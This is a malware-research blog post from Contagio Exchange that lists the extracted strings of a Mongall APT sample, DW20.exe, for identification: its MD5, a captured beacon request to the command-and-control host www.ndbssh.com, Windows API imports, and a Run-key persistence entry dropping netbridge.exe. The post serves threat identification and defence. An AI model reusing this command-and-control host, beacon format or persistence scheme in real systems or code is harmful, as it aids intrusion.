contagio malware exchange: Mongall strings

About contagio exchange

CONTAGIO EXCHANGE Contagio exchange was created to absorb malware samples shared by readers of Contagio. This is meant to be a community driven malware collection.

Edit Aug 2013 - The community is busy and Mila too so this was not a very active site (my fault probably) so I will be just dumping malware strings here - it often helps in malware identification and googling is the best way.

With just strings, not exactly a fun blog to read but might become s useful resource over time.

I will not be posting samples here, just md5. You can find the corresponding samples on contagio or ping me if you can't find

P.S. Robot pictures delivered by Robohash.com (generated from file hashes)

Tuesday, September 3, 2013

Mongall strings - APT

File: DW20.exe
MD5: d7dd5cda909190c6c03db5e7f8afd721
Size: 24576

GET /3000FC08000024FE0700363635353544304331303530313136300052656D6F746520504300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000070161646D696E000000000000000000000000000000000000000000000000000000000000000000000000 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.ndbssh.com:5331
Cache-Control: no-cache:

Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
Rich)
.text
`.rdata
@.data
Shared
T$@h
PWVS
_^]3
=TH@
SUV3
WSSSSh
SSPU
_^]3
L<$G
D$$j:P
_^][
_^]3
SUVW
_^][
_^][
t$pV
PjIj
D$ d
QjJj
It$RU
hlA@
L$$PQj
D$ P
u$hTA@
_^]3
=$0@
D$DP
D$(?
D$$$
SPSSh
T$pj
T$lQR
_^][
_^][
_^][
_^][
_^][
=tH@
hpH@
htH@
SVW
5\H@
%x0@
CopyFileA
GetSystemDirectoryA
GetModuleFileNameA
LoadLibraryA
Sleep
CloseHandle
SetEvent
OpenEventA
WaitForSingleObject
GetProcAddress
FreeLibrary
CreateEventA
ExitProcess
GetVolumeInformationA
GetComputerNameA
GlobalMemoryStatus
GetSystemInfo
GetVersionExA
GetVersion
KERNEL32.dll
USER32.dll
RegCloseKey
RegSetValueExA
RegOpenKeyA
RegQueryValueExA
RegOpenKeyExA
GetUserNameA
ADVAPI32.dll
InternetCloseHandle
InternetReadFile
HttpQueryInfoA
InternetOpenUrlA
InternetOpenA
InternetSetOptionA
WININET.dll
??3@YAXPAX@Z
??2@YAPAXI@Z
strchr
atoi
malloc
printf
sprintf
_beginthreadex
free
strrchr
__dllonexit
_onexit
MSVCRT.dll
_exit
_XcptFilter
exit
__p___initenv
__getmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_except_handler3
_controlfp
AVICAP32.dll
www.ndbssh.com
\netbridge.exe
msnetshare
%systemroot%\netbridge.exe
Software\Microsoft\Windows\CurrentVersion\Run
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
update exe file false
http://%s:%d/%d%s
ProcessTrans
~MHz
Hardware\Description\System\CentralProcessor\0
%08x
%s%s

Unicode Strings:
---------------------------------------------------------------------------
jjjj